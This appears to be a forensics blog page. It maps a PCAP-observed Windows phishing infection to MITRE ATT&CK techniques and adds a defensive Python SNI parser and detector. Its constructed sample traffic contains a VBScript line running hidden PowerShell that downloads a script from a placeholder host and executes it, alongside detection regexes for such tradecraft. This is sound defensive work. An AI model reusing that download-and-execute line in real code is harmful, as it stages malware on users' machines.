Network Forensics Case Study

MITRE ATT&CK Mapping of PCAP Analysis (Phishing → C2)

January 2026 Wireshark, PCAP, MITRE ATT&CK

Overview

This page focuses on the MITRE ATT&CK mapping derived from a Wireshark PCAP investigation of a Windows host infection. The mapping below includes only techniques supported by network-visible evidence (TLS SNI, HTTP streams, and observed connections).

For the full step-by-step traffic analysis (how the infected host was identified, how the staging server was confirmed, and how secondary C2 endpoints were validated), please refer to the detailed write-up in my GitHub repository.

Key Findings (Summary)

  • Infected host: 10.1.17.215 (Windows client)
  • Phishing domain: google-authenticator.burleson-appliance[.]net (confirmed via TLS SNI)
  • Staging / primary control server: 5.252.153[.]241 (VBScript + PowerShell + PE download over HTTP)
  • Secondary C2 endpoints: 45.125.66[.]32:2917 and 45.125.66[.]252:443 (post-infection TLS connections)

Note: This page intentionally keeps the findings brief. The full evidence trail, filters, and packet-level validation are documented in the GitHub write-up.

MITRE ATT&CK Mapping (Evidence-Based)

Scope: This mapping includes only techniques directly supported by network traffic and script contents observed in the PCAP.

  • Initial Access
    • T1566.002 – Phishing: Spearphishing Link
      Evidence: TLS Client Hello SNI to google-authenticator.burleson-appliance[.]net
      Reasoning: The SNI shows the victim connected over HTTPS to a domain impersonating Google Authenticator. The link itself (e-mail, message) is not visible in the PCAP, so the sub-technique is inferred from the lookalike domain and the download chain that immediately follows.
  • Execution
    • T1059.005 – Command and Scripting Interpreter: Visual Basic
      Evidence: HTTP-delivered VBScript (/api/file/get-file/264872) from 5.252.153[.]241
      Reasoning: VBScript was used as the initial execution stage.
    • T1059.001 – Command and Scripting Interpreter: PowerShell
      Evidence: PowerShell launched with -WindowStyle Hidden; second-stage script retrieved from /api/file/get-file/29842.ps1
      Reasoning: PowerShell execution and script retrieval are visible in HTTP streams.
  • Defense Evasion
    • T1027 – Obfuscated Files and Information
      Evidence: Obfuscated PowerShell content with encoded strings observed in delivered script
      Reasoning: Obfuscation is visible in the retrieved payload.
    • T1564.003 – Hide Artifacts: Hidden Window
      Evidence: PowerShell launched using -WindowStyle Hidden
      Reasoning: Execution intentionally hidden from the user.
  • Persistence
    • T1547.001 – Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder
      Evidence: Script creates TeamViewer.lnk pointing to C:\ProgramData\huo\TeamViewer.exe
      Reasoning: Persistence mechanism is explicitly defined in the script retrieved over HTTP.
  • Command and Control
    • T1105 – Ingress Tool Transfer
      Evidence: Network delivery of VBScript, PowerShell, and PE executable (PE confirmed by MZ header)
      Reasoning: Payloads and tools were transferred directly over HTTP from attacker infrastructure.
    • T1071.001 – Application Layer Protocol: Web Protocols
      Evidence: HTTP for staging/payload delivery; HTTPS/TLS for post-infection communication
      Reasoning: Web protocols were used across multiple stages of the infection chain.
    • T1573.002 – Encrypted Channel: Asymmetric Cryptography (TLS)
      Evidence: Repeated post-infection TLS sessions to 45.125.66[.]32:2917 and 45.125.66[.]252:443
      Reasoning: Encrypted outbound communication starting after the payload download, one session on a non-standard port (2917), is consistent with secondary C2. The TLS payloads are not decrypted, so this classification rests on timing and destination rather than on content.
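The extraction steps behind the findings and mapping above, as an added example (not code from the original write-up or its GitHub repository): a minimal TLS ClientHello SNI parser, an MZ/PE check for the downloaded executable, and a rule set that turns those observations into the technique IDs listed on this page. Every packet and script snippet is constructed for illustration; the 203.0.113.x addresses, the PE download path and the script bodies are assumptions, not artifacts from the PCAP, and only the hostnames, paths and endpoints quoted in the findings are taken from the page.

```python
"""Added example, not the original write-up's code: pull the network-visible
evidence behind this mapping out of raw payloads and turn it into ATT&CK IDs.
All packets and script snippets below are constructed for illustration."""
import re
import struct

PHISH_HOST = "google-authenticator.burleson-appliance.net"  # from the page's findings

def build_client_hello(server_name: str) -> bytes:
    """Minimal TLS 1.2 ClientHello record carrying an SNI extension (constructed)."""
    host = server_name.encode("ascii")
    entry = b"\x00" + struct.pack("!H", len(host)) + host          # name_type 0 = host_name
    sni_list = struct.pack("!H", len(entry)) + entry
    ext = struct.pack("!HH", 0, len(sni_list)) + sni_list          # extension 0 = server_name
    body = (b"\x03\x03" + bytes(32)                                 # version, random
            + b"\x00"                                                # session_id length 0
            + b"\x00\x02\x13\x01"                                    # one cipher suite
            + b"\x01\x00"                                            # null compression
            + struct.pack("!H", len(ext)) + ext)
    hs = b"\x01" + len(body).to_bytes(3, "big") + body              # handshake type 1 = ClientHello
    return b"\x16\x03\x01" + struct.pack("!H", len(hs)) + hs        # record type 22 = handshake

def build_fake_pe() -> bytes:
    """DOS header whose e_lfanew points at a PE signature (constructed, not a real binary)."""
    dos = bytearray(64)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 64)                           # e_lfanew = 64
    return bytes(dos) + b"PE\x00\x00" + bytes(20)

def extract_sni(record: bytes):
    """Return the server_name from a TLS ClientHello record; None if absent or truncated."""
    if len(record) < 6 or record[0] != 0x16 or record[5] != 0x01:
        return None
    hs = record[5:]
    try:
        p = 4 + 2 + 32                                   # handshake header, version, random
        p += 1 + hs[p]                                   # session_id
        p += 2 + struct.unpack_from("!H", hs, p)[0]      # cipher_suites
        p += 1 + hs[p]                                   # compression_methods
        ext_end = p + 2 + struct.unpack_from("!H", hs, p)[0]
        p += 2
        while p + 4 <= ext_end:
            etype, elen = struct.unpack_from("!HH", hs, p)
            p += 4
            if etype == 0:                               # server_name extension
                q, q_end = p + 2, p + elen               # skip server_name_list length
                while q + 3 <= q_end:
                    ntype, nlen = hs[q], struct.unpack_from("!H", hs, q + 1)[0]
                    if ntype == 0:
                        name = hs[q + 3:q + 3 + nlen]
                        return name.decode("ascii") if len(name) == nlen else None
                    q += 3 + nlen
            p += elen
    except (IndexError, struct.error):
        return None                                      # truncated record: make no claim
    return None

def is_pe(body: bytes) -> bool:
    """MZ header plus 'PE\\0\\0' at e_lfanew; the MZ check alone (as in the write-up) is weaker."""
    if len(body) < 0x40 or body[:2] != b"MZ":
        return False
    off = struct.unpack_from("<I", body, 0x3C)[0]
    return body[off:off + 4] == b"PE\x00\x00"

HIDDEN_RE = re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)                                        # T1564.003
ENCODED_RE = re.compile(r"FromBase64String|-e(?:nc(?:odedcommand)?)?\s+[A-Za-z0-9+/=]{20,}", re.I)  # T1027
STARTUP_RE = re.compile(r"startup\\[^\n\\]*\.lnk", re.I)                                             # T1547.001
VBS_RE = re.compile(r"\bCreateObject\(|\bWScript\.")                                                 # T1059.005

def map_to_attack(observations):
    """Map TLS ClientHello / HTTP response observations to ATT&CK IDs plus the evidence that fired."""
    hits = {}
    add = lambda tid, why: hits.setdefault(tid, []).append(why)
    for o in observations:
        if o["kind"] == "tls_client_hello":
            sni = extract_sni(o["data"])
            if sni == PHISH_HOST:
                add("T1566.002", f"SNI {sni}")
            if o.get("post_infection"):                  # timing vs. the download is the analyst's call
                add("T1573.002", f"TLS to {o['dst']}:{o['port']}")
        elif o["kind"] == "http_response":
            add("T1071.001", f"HTTP {o['path']}")
            text = o["body"].decode("latin-1")
            script = False
            if VBS_RE.search(text):
                add("T1059.005", f"VBScript via {o['path']}"); script = True
            if o["path"].lower().endswith(".ps1") or "powershell" in text.lower():
                add("T1059.001", f"PowerShell via {o['path']}"); script = True
            if script or is_pe(o["body"]):
                add("T1105", f"payload via {o['path']}")
            if HIDDEN_RE.search(text):  add("T1564.003", "-WindowStyle Hidden")
            if ENCODED_RE.search(text): add("T1027", "encoded strings in script")
            if STARTUP_RE.search(text): add("T1547.001", ".lnk written to Startup folder")
    return hits

# Constructed traffic mirroring the page's chain; script text and the PE path are illustrative only.
SAMPLE = [
    {"kind": "tls_client_hello", "dst": "203.0.113.10", "port": 443, "data": build_client_hello(PHISH_HOST)},
    {"kind": "http_response", "path": "/api/file/get-file/264872",
     "body": b'Set sh = CreateObject("WScript.Shell")\r\n'
             b'sh.Run "powershell -WindowStyle Hidden -c iwr http://203.0.113.20/api/file/get-file/29842.ps1|iex", 0\r\n'},
    {"kind": "http_response", "path": "/api/file/get-file/29842.ps1",
     "body": b'$s = [Text.Encoding]::Unicode.GetString([Convert]::FromBase64String("QwA6AFwAUAByAG8A"))\r\n'
             b'$lnk = "$env:APPDATA\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\TeamViewer.lnk"  # -> C:\\ProgramData\\huo\\TeamViewer.exe\r\n'},
    {"kind": "http_response", "path": "/api/file/get-file/example-pe", "body": build_fake_pe()},
    {"kind": "tls_client_hello", "dst": "45.125.66.32", "port": 2917, "post_infection": True,
     "data": build_client_hello("")},
]
```

Run over the constructed sample, `map_to_attack` returns exactly the nine technique IDs in this mapping, each with the observation that produced it. Note what the code deliberately does not decide: whether a TLS session is "post-infection" is a timing judgement relative to the payload download, so it is passed in as a flag rather than derived, and a truncated ClientHello yields no SNI claim at all rather than a partial hostname.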

Takeaway

This mapping shows how MITRE ATT&CK techniques can be supported using network evidence alone. For the complete packet-by-packet proof (filters, HTTP streams, and the reasoning used to confirm the secondary C2 endpoints), see the full write-up in the GitHub repository linked below.